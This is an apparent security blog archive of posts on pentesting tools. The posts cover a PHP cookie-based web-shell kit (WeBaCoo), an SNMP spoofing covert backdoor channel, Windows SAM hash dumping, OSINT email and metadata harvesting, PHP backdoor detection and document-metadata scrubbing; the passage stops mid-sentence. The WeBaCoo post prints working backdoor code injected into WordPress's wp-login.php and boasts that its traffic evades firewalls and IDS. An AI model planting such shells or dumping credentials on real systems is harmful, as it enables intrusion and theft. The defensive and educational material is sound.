Anestis Bechtsoudis » Tools & Scripts
http://bechtsoudis.com
Driven by Passion for Challenges

SNMP-BCC — Relay-ing on SNMP for backdoor channel
Sun, 15 Jan 2012

Lately I'm working on an SNMP reflection toolkit to study the effects and impact ratio of SNMP reflection DoS attacks. During the development phase I spotted some interesting features of the SNMP request-reply model. More specifically, I noticed that if you send an invalid SNMP OID in a GetRequest message, the agent replies with a Response message that includes an error code and the same invalid OID, as specified in the relevant RFCs. SNMP-BCC (Backdoor Communication Channel) takes advantage of this SNMP feature, combined with IP source spoofing techniques, to create a stealth communication channel that uses the SNMP agent as a relay.
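The behavior is easy to reproduce with the Net-SNMP command line tools (a quick sketch; the host, community string and nonexistent OID below are placeholders):

# query a nonexistent OID against an SNMPv1 agent
snmpget -v 1 -c public 192.0.2.10 .1.3.6.1.4.1.99999.1
# the agent answers with an error Response that still carries the OID,
# which snmpget reports roughly as:
#   Reason: (noSuchName) There is no such variable name in this MIB.
#   Failed object: .1.3.6.1.4.1.99999.1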

SNMP (Simple Network Management Protocol) is a UDP-based protocol used mainly for monitoring purposes. Its connectionless UDP nature leaves SNMP exposed to IP source spoofing attacks. However, this does not seem to concern network and system administrators, as my pen-test cases reveal. The reason admins usually (though wrongly) do not bother to secure their agents is the read-only behavior: while SNMP offers both read (get info) and write (set configuration variables) operations, most infrastructures implement only the read side for monitoring. This leads admins to believe there are no underlying security risks, shifting the problem to anti-spoofing mechanisms.

While messing around with SNMP functionality, the idea of developing SNMP-BCC was born as a PoC against the flawed SNMP setups described above. SNMP-BCC can create a stealth backdoor communication channel with an "owned" host, using an SNMP agent as a relay. First, the data to be sent are packed following the ASN.1 OID prototype into an SNMP GetRequest packet. Then the source IP address of the UDP packet is set to the end client's IP address. This source-spoofed packet is transmitted to the public SNMP agent (the community string must be known). The SNMP agent cannot resolve the invalid OID and replies with an error response for it. This error response, carrying the initial packed data untouched, is finally delivered to the end host, where a client with the relevant decoder can parse the data.

SNMP-BCC is mainly a post-exploitation tool that a pen-tester can use to establish a stealthy, hard-to-detect communication channel with a compromised host. Beyond backdoor communication, the tool can also serve data leakage and node pivoting purposes. While writing this post, the whole project is in its early stage and I haven't yet decided whether it is worth continuing and, if so, under which working model. Still, I developed and published SNMP-BCC in order to get feedback from my colleagues and the infosec community about the next steps.

SNMP-BCC is written in perl using the raw-sockets library and is available on GitHub under the GPLv3 license. Using 'snmpbcc.pl', users can create spoofed SNMP packets carrying system commands from an interactive pseudo-shell mode. For testing purposes the project also includes 'backdoor.pl', which serves as a listener on the end client host. I haven't implemented a full ASN.1 decoder in the backdoor code; that's why the command is wrapped with some special characters ('#$#') so it can be easily extracted from the response message.
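For illustration, a listener can carve the wrapped payload out of a captured response with a one-liner like the following (a minimal sketch, not backdoor.pl's actual logic; $response is a hypothetical variable holding the decoded message):

# extract the data wrapped between the '#$#' markers
echo "$response" | sed -n 's/.*#\$#\(.*\)#\$#.*/\1/p'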

You can get the latest version of the tool by cloning the repository

git clone git://github.com/anestisb/SNMP-BCC.git

Or by directly downloading the zip project archive

https://github.com/anestisb/SNMP-BCC/zipball/master

Here is a screenshot with SNMP-BCC in action:

 

Your comments are greatly appreciated and will help the tool evolve.

A. Bechtsoudis

WeBaCoo (Web Backdoor Cookie) Script-Kit – The Birth
Tue, 29 Nov 2011

Recently I was messing around with some PHP backdoors capable of providing a "pseudo"-terminal connection to a remote web server injected with a chunk of malicious PHP code. All the existing scripts and tools (such as weevely and hookworm) send the shell commands hidden in HTTP header fields, but the server's output is printed out as part of the HTML code. Inspired by these implementations, I thought: why not send the server's command output in the HTTP response headers too? Out of these dark thoughts, the WeBaCoo (Web Backdoor Cookie) script-kit was born.

The general concept is pretty simple. First, the backdoor PHP code is generated from payloads built around core PHP system functions, operating under a basic cookie-handling mechanism. After the code is injected, the client can send shell commands hidden in Cookie headers, obfuscated with base64 encoding. On the server side the shell command is executed and the output is transmitted back to the client, also base64-encoded, hidden in Cookie headers.
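The exchange can be mirrored manually with curl (a minimal sketch using the cm/cn/cp cookie parameters of the raw payload shown in the second case study below; WeBaCoo's obfuscated mode differs in detail):

# 'cm' carries the base64-encoded command, 'cn' names the response
# cookie and 'cp' is the delimiter wrapping the encoded output
CMD=$(echo -n "whoami" | base64)
curl -s -D - -o /dev/null \
     -b "cm=$CMD; cn=resp; cp=XX" \
     http://victim.example.com/backdoor.php
# the command output comes back base64-encoded between the 'XX'
# delimiters in a Set-Cookie response header; decode it with base64 -d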

WeBaCoo is written in Perl and is available on GitHub. Clone the repository:

git clone git://github.com/anestisb/WeBaCoo.git

Or download the latest version from:

http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

 

Let's see two case studies that present WeBaCoo's functionality. I will use a local Burp proxy (127.0.0.1:8080) to inspect the HTTP cookie headers.

1. Simple case

The first scenario involves adding a new PHP file with the obfuscated backdoor code to the webroot path. After that, the client can use the terminal mode to execute commands on the server.

Initially let’s create the backdoor file using the ‘shell_exec’ system function:

root@testbed:~# ./webacoo.pl -g -f 2 -o backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "backdoor.php" created.

Then I upload backdoor.php to the victim server and start a "terminal" connection:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the relevant request and response recorded by Burp can be seen in the following screenshots:

2. Complex case – backdooring the WordPress login

Users familiar with WordPress know that before the login process the server sets a test cookie to check whether the browser has cookies enabled. Right after that test-cookie block I will inject the backdoor code unobfuscated. I create the PHP payload using the 'passthru' function and the -r (raw output) flag to get the un-obfuscated code.

root@testbed:~# ./webacoo.pl -g -f 4 -o raw-backdoor.php -r

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "raw-backdoor.php" created.

Then the malicious code is injected below the test-cookie block, so wp-login.php looks as follows (only the crucial lines are included):

//Set a cookie now to see if they are supported by the browser.
setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH )
        setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);
 
//My payload: run the base64-decoded command from the 'cm' cookie and return
//its output base64-encoded in a cookie named by 'cn', wrapped by the 'cp' delimiter
if(isset($_COOKIE['cm'])){ob_start();passthru(base64_decode($_COOKIE['cm']).' 2>&1');setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp'], 0, SITECOOKIEPATH, COOKIE_DOMAIN);ob_end_clean();}
 
// allow plugins to override the default actions, and to add extra actions if they want
do_action( 'login_init' );
do_action( 'login_form_' . $action );

After the injection I establish a "terminal" connection to the infected server and execute my commands:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/wordpress/wp-login.php -p 127.0.0.1:8080

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the relevant request and response recorded by Burp:

As you can see, the communication data are pretty stealthy and will not trigger typical web application firewalls or IDS/IPS setups. I would appreciate your feedback from tests under your own setups, to help evaluate and evolve WeBaCoo's functionality.

A. Bechtsoudis

Detect & Protect from PHP Backdoor Shells
Wed, 15 Jun 2011

Recently I undertook the investigation of a web server hacking incident. It was an up-to-date Debian machine (apache2+php5+mysql) hosting a Joomla CMS for a logistics website. The web admin had installed a Joomla extension plugin that allows users to put custom PHP code in their articles. The attacker had "phished" valid login credentials for the website and published an article in which he placed a simple PHP backdoor shell. The malicious code wasn't noticed by the moderator who approved the article, so the article went public as usual.

After finishing the forensic procedures, I found out that the attacker had used the weevely tool to generate the PHP backdoor shell injected into the article. I had never dealt with such a PHP backdoor incident before, which resulted in a two-day exhaustive investigation. After finding the problem and cleaning the infection, I did a little research on PHP backdoor detection and protection tools & scripts.

 

In the rest of the article I summarize the basic steps for detecting and protecting against malicious PHP code. Different approaches to detecting and protecting against malicious web activity exist, depending on the working framework, but I try to provide a general guideline using tools and procedures I have applied in my own cases.

 

Step1 – PHP Configuration Security Auditing

PHP is a very powerful programming language, but the running configuration must be tweaked very carefully to minimize security holes. Several security auditing tools and scripts exist; of the ones I have tested, I prefer the phpsecinfo tool. phpsecinfo parses the PHP configuration and generates a web report with detailed information and improvement suggestions.

Here are some screenshots from an example report:

Step2 – Running Web Platform Configuration

Popular web CMSes and platforms offer a large number of extensions and plugins to their users. Inexperienced web developers & admins tend to install as many plugins as possible, believing this makes the website more attractive or functional. From a security perspective this approach is wrong: more plugins mean more security risks.

The developers of these popular web platforms follow the latest security exploits and create the relevant patches, securing the core platform against already known attacks. On the other side, plugin source code is not revised and tested for security holes nearly as regularly, putting the whole platform in great danger.

Admittedly, some developers do diligently update their plugins' source code and provide a sufficient security level, but most plugins follow the rule above. So do not install unnecessary plugins on your web platform, and when you have to, carefully review the plugin's source code and how it affects the core platform. Additionally, install plugins manually so you can carefully inspect and tweak the configuration variables and paths.

 

 

Step3 – Detection Tools & Scripts

PHP backdoor shells use PHP functions that execute external commands on the host machine. These functions are well known, so with a simple grep script someone can detect the files in which they occur and investigate whether each occurrence is legitimate or malicious. Here is a simple bash script that searches for system functions, file streams and base64-encoded code:

 

#!/bin/bash
 
#------------------------------------------------#
# Search web files for potential malicious code. #
#------------------------------------------------#
 
SEARCH_DIR="/var/www"
PATTERNS="passthru|shell_exec|system|phpinfo|base64_decode|popen|exec|proc_open|pcntl_exec|python_eval|fopen|fclose|readfile"
 
grep -RPl --include=*.{php,txt} "($PATTERNS)" $SEARCH_DIR
 
exit 0

 

Going one step further than simple search scripts, there is NeoPI. NeoPI is a python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. I tested NeoPI on the incident I mentioned, and the tool successfully located the malicious file and ranked it high. Be aware, though, that its statistical methods may also rank a malicious file low while assigning a bigger risk percentage to legitimate files, disorienting your investigation.
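An invocation could look like the following (a sketch based on the project README of that era; flags may differ between versions, so check ./neopi.py -h first):

# run all of NeoPI's statistical tests (-a) against the web root,
# restricting the scan to PHP files via the optional filename regex
./neopi.py -a /var/www "\.php$"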

 

For more advanced and comprehensive reports, one can turn to a malware scanner. For the incident I examined I used the LMD (Linux Malware Detect) scanner. This was the first time I had used this tool and I have to say I am very satisfied with its functionality. To test it further, I created four more PHP backdoors using known scripts from pen-test frameworks, and LMD successfully found all of them.
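An LMD scan of the web root boils down to a couple of commands (a sketch; it assumes the maldet package is installed and in $PATH):

maldet -u            # update the LMD signature set first
maldet -a /var/www   # scan all files under the web root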

 

And of course there is the powerful ClamAV antivirus, but I didn't have time to set it up and test its results against the PHP backdoors I mentioned. From what I have read on the web, though, it is very efficient and has successfully located PHP backdoors and malware code.
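A comparable ClamAV scan would be (a sketch, assuming the clamav package with freshclam-updated signatures):

# recursively scan the web root, reporting only infected files
clamscan -r -i /var/www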

 

 

Step4 – Protection

Protection countermeasures are formed using the tools and information from the previous steps. Here are some PHP configuration points that sysadmins must pay attention to (a sample php.ini sketch follows the list):

    • allow_url_fopen: when enabled, PHP file functions are allowed to include remote files from external FTP or HTTP locations. This option is enabled by a default installation and is rarely needed.
    • Dangerous PHP functions: using the disable_functions directive in php.ini, disable all the dangerous PHP system functions (system, shell_exec, passthru etc.) that might be used by malicious code. Be careful with the rare cases in which a web platform needs some of these functions.
    • open_basedir: use this directive in php.ini to limit file operations to the defined directory and below.
    • web user permissions: carefully examine the web user's access level and its permissions.
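A minimal php.ini sketch covering the first three points might look like this (the values are illustrative assumptions; adapt the path and the function list to your platform):

; example php.ini hardening directives
allow_url_fopen = Off
disable_functions = system,shell_exec,passthru,exec,popen,proc_open,pcntl_exec
open_basedir = /var/www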

 

By carefully acting on the PHP security audit report, adopting an automated malware detection tool, and reviewing the points mentioned above, you can establish an adequate security level for your running web servers and platforms.

A. Bechtsoudis

Pastenum: Enumerating Text Dump Websites
Wed, 08 Jun 2011

Text dump websites are used by programmers and system administrators to share and store pieces of source code and configuration information. Two of the most popular text dump websites are pastebin and pastie. Day by day, more and more programmers, amateur system administrators and regular users are captivated by the attractive features of these web tools and use them to share large amounts of configuration and source code information. Therefore, as happens on every popular web platform, sensitive information sharing is inevitable. Potential attackers use these web platforms to gather information about their targets, while on the other side penetration testers search these sites to prevent critical information leakage.

 

Most of the text dump web platforms offer a search mechanism, so anyone can manually query the database for matching strings. However, an automated script/tool capable of querying all these text dump websites and generating an overall search report would be very useful in the reconnaissance phase of a penetration test. Pen-testers can use such an automated tool to efficiently search for leaked configuration and login credential information that would help an attacker profile the victim system and find a security hole.

Recently I came across such a script on the web: pastenum. Pastenum is a ruby script written by Nullthreat, member of the Corelan Team. It can query pastebin, pastie and github for user-defined strings and generate an overall HTML report with the search results.

 

Pastenum can be downloaded from here, while detailed installation information can be found here.

 

Let's see some screenshots with pastenum in action.

A. Bechtsoudis

Gathering & Retrieving Windows Password Hashes
Sat, 04 Jun 2011

Penetration tests might involve Windows user password auditing. In Windows systems (NT, 2000, XP, Vista, 7) user password hashes (LM and NTLM hashes) are stored in a registry file named SAM (Security Accounts Manager). Until recently, whenever I had to extract Windows password hashes I had two alternatives: the manual way, or Windows password auditing suites (Cain&Abel, Ophcrack, L0phtCrack etc). But yesterday I came across a very useful python script named HashGrab2. HashGrab2 automatically mounts Windows drives and extracts username-password hashes from the SAM and SYSTEM files located on those drives, using the samdump2 utility. HashGrab2 is ideal when you just want to collect the Windows password hashes in order to import them into your preferred password cracker.

 

SAM Database Protection:

Offline attacks: Microsoft introduced the SYSKEY utility to partially encrypt the on-disk copy of the SAM file. Information about the SYSKEY encryption key is stored in the SYSTEM file, located under the path %sysroot%/System32/config/.

Online attacks: the SAM file cannot be moved or copied while Windows is running, since the Windows kernel obtains and keeps an exclusive filesystem lock on it, and will not release that lock until the operating system has shut down or a blue screen exception has been thrown. However, the in-memory copy of the SAM's contents can be dumped using various techniques, making the password hashes available for offline brute-force attacks.

 

HashGrab2:

HashGrab2, written by s3my0n, is an offline-gathering python script that automatically discovers Windows drives and extracts the username-hash pairs to a user-defined file. HashGrab2 must be run as root (in order to mount the Windows drives) and requires python. It is preferable to install samdump2 from your distribution's repositories so that the username-hash pairs are acquired automatically.
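For reference, the manual procedure that HashGrab2 automates looks roughly like this (a sketch; the device and hive paths are examples, and the samdump2 syntax depends on its version):

# mount the Windows partition read-only
mount -o ro /dev/sda1 /mnt/win
# newer samdump2 releases take the SYSTEM and SAM hives directly
samdump2 /mnt/win/Windows/System32/config/SYSTEM \
         /mnt/win/Windows/System32/config/SAM > hashes.txt
# older 1.x versions need the SYSKEY boot key extracted first:
#   bkhive SYSTEM keyfile && samdump2 SAM keyfile > hashes.txt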

 

HashGrab2 can be downloaded from here.
zip md5sum:0db4f35062d773001669554c8e16015a

 

user1@bt5:Scripts$ ./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [-] Error: you are not root

 

root@bt5:Scripts$./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [*] Mounted /dev/sda1 to /mnt/qWLgG5
 
 [*] Mounted /dev/sda2 to /mnt/4sDAQO
 
 [*] Copying SAM and SYSTEM files...
 
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
 
Root Key : CMI-CreateHive{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}
 
 [*] Unmounting partitions...
 
 [*] Deleting mount directories...
 
 [*] Deleting ['./4sDAQO']

 

root@bt5:Applications$cat 4sDAQO.txt 
Administrator:500:HASH:::
Guest:501:HASH:::
user1:1001:HASH:::

 
 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 
 

A. Bechtsoudis

Enumerating Metadata: Part3 odf files
Thu, 12 May 2011

In the third part of the Enumerating Metadata series, we will talk about the Open Document Format (ODF), supported by popular document software suites (OpenOffice, LibreOffice, Microsoft Office 2007 and more). ODF is a family of XML-based file formats used to represent new-age electronic documents (spreadsheets, presentations, word documents etc). The standard ODF file is a ZIP-compressed archive containing the appropriate files and directories. The document metadata is stored in a separate XML file named meta.xml. The metadata contained in this file can comprise pre-defined metadata, user-defined metadata, as well as custom metadata (like ODF version, Title, Description and more).

The most common filename extensions used for OpenDocument documents are:

  • .odt for word processing (text) documents
  • .ods for spreadsheets
  • .odp for presentations
  • .odb for databases
  • .odg for graphics
  • .odf for formulae, mathematical equations

A packaged ODF file will contain, at a minimum, six files and two directories archived into a modified ZIP file. The structure of the basic package is as follows:

|-- META-INF
|   `-- manifest.xml
|-- Thumbnails
|   `-- thumbnail.png
|-- content.xml
|-- meta.xml
|-- mimetype
|-- settings.xml
`-- styles.xml

 

Important! If you encrypt your document with a protection password, the meta.xml file is not encrypted and is readable by anyone, even without the document password. So be careful: password protection does not solve the metadata problem.

 

We can see that the ODF metadata types contain a large amount of usable information profiling editors and their software tools. An attacker can gather this kind of information and use it as a starting point for exploitation attacks. So it is important for document users to control the information leakage emanating from hidden metadata.

Document software suites, such as OpenOffice and LibreOffice, offer editing options for the metadata types (usually under File->Properties). You can use this feature to edit or clean the desired fields. The problem is that this method works per file, so if you have a large database of ODF documents to handle, you obviously need an automated tool/script. Because ODF files are zip containers, the solution is pretty easy: you can massively delete or update the meta.xml of all documents using the zip tool and its delete/update options. If you delete the meta.xml from a document, be careful: the next time the document is saved by the relevant software, the XML is recreated with the software's predefined values for the metadata fields.
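For a single document, inspecting and stripping the metadata comes down to two commands (a quick sketch; document.odt is a placeholder name and xmllint is only used for pretty-printing):

# print the document's metadata to stdout
unzip -p document.odt meta.xml | xmllint --format -
# remove the metadata file from the zip container
zip -d document.odt meta.xml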

I usually do not want any metadata leakage from my documents, so I delete the meta.xml file from the document container. I wrote a simple bash script that deletes all meta.xml files from ODF documents under a user-specified directory:

#!/bin/bash
 
#============================================================#
# Author     : Anestis Bechtsoudis                           #
# Date       : 12 May 2011                                   #
# Description: Bash script that removes metadata (meta.xml)  #
# from ODF (Open Document Format) files used from OpenOffice #
#============================================================#
 
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 1 ] ; then
  echo "Usage: $0 [dir]"
  echo -e "\t[dir]: Directory containing ODF Files"
  exit
fi
 
#===============================================#
# Open Document format supports:                #
#    .odt for word processing (text) documents  #
#    .ods for spreadsheets                      #
#    .odp for presentations                     #
#    .odb for databases                         #
#    .odg for graphics                          #
#    .odf for formulae, mathematical equations  #
#                                               #
# Remove unwanted filetypes                     #
#===============================================#
FILETYPES='(odt)|(ods)|(odp)|(odb)|(odg)|(odf)'
 
# Temp file for search results
TMPFILE=/tmp/$0.tmp
 
find $1 -type f | egrep $FILETYPES > $TMPFILE
 
while read line
do
  zip -d $line meta.xml
done < $TMPFILE
 
rm $TMPFILE
 
IFS=$SAVEIFS

In case you do not want to completely remove the meta.xml files, you can write a basic meta.xml template and alter the above script to update (instead of delete) the meta.xml of all ODF documents. The update can be done using the -f (freshen) argument of the zip tool.
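For example, with a sanitized meta.xml template sitting in the current directory, a single document could be refreshed like this (a sketch; zip -f only replaces the archived copy when the on-disk file is newer):

# overwrite the archived meta.xml with the local template copy
zip -f /path/to/document.odt meta.xml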

The above approach can be adopted under a Windows OS by writing the relevant batch files.
 


A. Bechtsoudis

Knowing is half the battle…
Tue, 10 May 2011

G.I. Joe used to say, "Knowing is half the battle." The collection of prior information can make the difference between success and failure of a penetration test.

The first phase of a penetration test, the reconnaissance phase, includes information gathering & network mapping procedures. Automated intelligent reconnaissance tools have been developed extensively over the last years, offering a reliable and fast starting point for the exploitation phase. In this article I will focus on information gathering tools used to collect valid login names, emails, DNS records and WHOIS databases. A penetration tester can use the gathered information to profile the target, launch client-side attacks, search social networks for additional knowledge, bruteforce authentication mechanisms etc.

We can easily gather this information with simple scripts, without following an extensive OSINT (Open Source Intelligence) procedure. I should mention, though, that a detailed and extensive OSINT phase will produce better results and will be necessary under certain business needs.

I will analyze Edge-Security’s theHarvester and Metasploit’s Search Email Collector tools.

 

theHarvester

theHarvester (currently at version 2.0) is a python script that can gather email accounts, usernames and subdomains from public search engines and PGP key servers.

The tool supports the following sources:

  • Google – emails, subdomains/hostnames
  • Google profiles – Employee names
  • Bing search – emails, subdomains/hostnames, virtual hosts (requires bing API key)
  • Pgp servers – emails, subdomains/hostnames
  • Linkedin – Employee names
  • Exalead – emails, subdomains/hostnames

The latest version of theHarvester can be downloaded from the GitHub repository here.

Give execute permissions to the script file and run it to see the available options:

$ ./theHarvester.py 
 
*************************************
*TheHarvester Ver. 2.0 (reborn)     *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*cmartorella@edge-security.com      *
*************************************
 
Usage: theharvester options 
 
       -d: Domain to search or company name
       -b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,exalead,all)
       -s: Start in result number X (default 0)
       -v: Verify host name via dns resolution and search for vhosts(basic)
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
            google 100 to 100, and pgp does not use this option)
       -f: Save the results into an XML file
 
Examples:./theharvester.py -d microsoft.com -l 500 -b google
         ./theharvester.py -d microsoft.com -b pgp
         ./theharvester.py -d microsoft -l 200 -b linkedin

You can see some execution examples in the following screenshots:

Metasploit Email Collector

Search email collector is a metasploit module written by Carlos Perez. The module runs under the metasploit framework and uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain.

You can view the source code here.

The module options are:

DOMAIN The domain name to locate email addresses for
OUTFILE A filename to store the generated email list
SEARCH_BING Enable Bing as a backend search engine (default: true)
SEARCH_GOOGLE Enable Google as a backend search engine (default: true)
SEARCH_YAHOO Enable Yahoo! as a backend search engine (default: true)
PROXY Proxy server to route connection. <host>:<port>
PROXY_PASS Proxy Server Password
PROXY_USER Proxy Server User
WORKSPACE Specify the workspace for this module

 

Let’s see a running example:

msf > 
msf > use auxiliary/gather/search_email_collector 
msf auxiliary(search_email_collector) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(search_email_collector) > run
 
[*] Harvesting emails .....
[*] Searching Google for email addresses from example.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from example.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from example.com
[*] Extracting emails from Yahoo search results...
[*] Located 49 email addresses for example.com
[*] 	555-555-0199@example.com
[*] 	a@example.com
[*] 	alle@example.com
[*] 	b@example.com
[*] 	boer_faders@example.com
[*] 	ceo@example.com
[*] 	defaultemail@example.com
[*] 	email@example.com
[*] 	example@example.com
[*] 	foo@example.com
[*] 	fsmythe@example.com
[*] 	info@example.com
[*] 	joe@example.com
[*] 	joesmith@example.com
[*] 	johnnie@example.com
[*] 	johnsmith@example.com
[*] 	myname+spam@example.com
[*] 	myname@example.com
[*] 	name@example.com
[*] 	nobody@example.com
....

 


DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 

 

A. Bechtsoudis

Enumerating Metadata: Part2 pdf files
Tue, 03 May 2011

In my article Gathering & Analyzing Metadata Information I emphasized the security risk of hidden metadata in publicly shared documents and showed how this info can be gathered massively through certain tools. So I began writing a series of articles analyzing the different types of file metadata and the tools someone can use to view and edit/remove them. In the first part I analyzed the case of exif jpeg metadata, and in this article I continue with the famous Portable Document Format (PDF) file, presenting the appropriate tools to handle its metadata information.

We all use PDF files for professional or personal document sharing. PDF metadata is usually populated by PDF-converting applications and might expose undesirable information to third parties. Especially since the adoption of XMP (in PDF version 1.6 and later), the number of available hidden information fields has increased. Adobe Acrobat Pro offers an extended editor for the metadata fields, but Adobe Reader and many other editors and converters do not. Some of the metadata information fields are:

    • AdHocReviewCycleID
    • Appligent
    • Author
    • AuthorEmail
    • AuthorEmailDisplayName
    • Company
    • CreationDate
    • Creator
    • EmailSubject
    • Keywords
    • ModDate
    • PreviousAdHocReviewCycleID
    • Producer
    • PTEX.Fullbanner
    • SourceModified
    • Subject
    • Title

A lot of tools can extract/edit/remove PDF metadata, but I prefer to use open source tools, so I will analyze the use of the PDF Toolkit (pdftk) under a linux environment. pdftk does not require Acrobat and runs under Windows, Linux, Mac OS X, FreeBSD and Solaris. PDF Toolkit has many features, but in this article I will cover the ones we need for metadata manipulation.

Initially you will have to install pdftk using your distribution’s package manager or by compiling the sources.

In order to extract metadata information from a pdf file you can use the dump_data option as follows:

$pdftk file.pdf dump_data
InfoKey: Creator
InfoValue: PScript5.dll Version 5.2.2
InfoKey: Title
InfoValue: Microsoft Word - Ergastiriaki_Askisi_2011.doc
InfoKey: Author
InfoValue: Administrator
InfoKey: Producer
InfoValue: GPL Ghostscript 8.15
InfoKey: ModDate
InfoValue: D:20110406122119
InfoKey: CreationDate
InfoValue: D:20110406122119
PdfID0: bb8f9ac70cc66e8cabecb4144806f
PdfID1: bb8f9ac70cc66e8cabecb4144806f
NumberOfPages: 3

To edit metadata fields you have to dump the metadata into a file, edit the desired values in that file, and then update the pdf by importing the edited metadata file.

To extract the metadata to a file use the output option:

$pdftk file.pdf dump_data output pdf-metadata

Using your preferred text editor, edit the pdf-metadata InfoValues (I prefer to leave every field blank). Then update the initial file using the edited metadata file:

$pdftk file.pdf update_info pdf-metadata output no-metadata.pdf

To automate the above steps, I wrote a simple script that works on a whole directory of pdf files:

#!/bin/bash
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 2 ] ; then
        echo "Usage: $0 [dir] [meta-file]"
        echo -e "\t[dir]: Directory containing pdf files"
        echo -e "\t[meta-file]: File containing desired metadata"
        exit
fi
 
PDFTK="/usr/bin/pdftk"
SOURCEDIR="$1"
METAFILE="$2"
PDFTMPFILE="/tmp/temp.pdf"
 
for i in $( find $SOURCEDIR -type f -name "*.pdf" ); do
  cp $i $PDFTMPFILE
  $PDFTK $PDFTMPFILE update_info $METAFILE output $i
  rm $PDFTMPFILE
done
 
IFS=$SAVEIFS

And here is a clean metadata file that you can use:

InfoKey: Author
InfoValue:
InfoKey: Company
InfoValue:
InfoKey: CreationDate
InfoValue:
InfoKey: Creator
InfoValue:
InfoKey: ModDate
InfoValue:
InfoKey: Producer
InfoValue:
InfoKey: SourceModified
InfoValue:
InfoKey: Title
InfoValue:

 

 

A. Bechtsoudis

Gathering & Analyzing Metadata Information
Sun, 01 May 2011

Any organization or individual who sends or receives files (documents, spreadsheets, images etc) electronically needs to be aware of the dangers of hidden metadata. Metadata can include user names, path and system information (like directories on your hard drive or network share), software versions, and more. This data can be used for a brute-force attack, social engineering, or finding pockets of critical data once inside a compromised network. Thwarting an attacker's attempts to exploit the metadata easily found on your company's or personal website, in digital documents, and in search-engine caches is hard, if not nearly impossible.

Mass metadata gathering can be accomplished pretty easily using search engines and their caching features. In this article I will present the use of MetaGoofil & FOCA, two free metadata gathering & analysis tools. Using these kinds of tools, an attacker can gather large amounts of crucial information about a target organization or individual. On the other side, an IT security administrator can use them to locate the organization's metadata leakage and prevent it or reduce it to a safe level.

 

FOCA

FOCA (Fingerprinting an Organization with Collected Archives), developed by Informatica64, is one of the most popular pen-testing tools for automated gathering and extraction of file metadata. FOCA supports all the common document extensions (doc, docx, ppt, pptx, pdf, xls, xlsx, ppsx, etc). FOCA runs on Windows and a free version can be downloaded from here. There is also a commercial version available.

FOCA is a pretty powerful tool with a lot of options, but in this article I want to show how someone would use its basic feature set to search a domain for documents containing metadata. To do this, first download and install FOCA and create a new project from the File menu. The project must be centered on a particular target domain. Once the project is created, FOCA uses a list of search engines to search the domain for file types known to contain usable metadata.

 

Here are some screenshots of FOCA in action under a Windows 7 machine.

 

 

MetaGoofil

Metagoofil is an information gathering tool that can extract metadata from public documents (pdf, doc, xls, ppt, odp, ods) available on targeted websites. It can download all the public documents published on the target website and create an HTML report page that includes all the extracted metadata. At the end of the report are listed all the potential usernames and disclosed paths recorded in the gathered metadata. Using the list of potential usernames, an attacker can prepare a bruteforce attack on running services (ftp, ssh, pop3, vpn etc), and from the disclosed paths he can make guesses about the OS, network names, shared resources etc.

Metagoofil uses the google search engine to find documents published on the target website, with queries like site:example.com filetype:pdf. After locating the file URLs, it downloads the files to a local directory and extracts the hidden metadata using libextractor. Metagoofil is written in python and can run on any OS that fulfills the libextractor dependency. Depending on your OS, you must edit the running script and provide the correct path of the extract binary.
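A typical run looks roughly like this (a sketch against the 1.4b-era command line; option letters may differ between releases, so check the built-in help):

# search example.com for all supported filetypes, limit to 100 results,
# download the files to ./files and write the report to report.html
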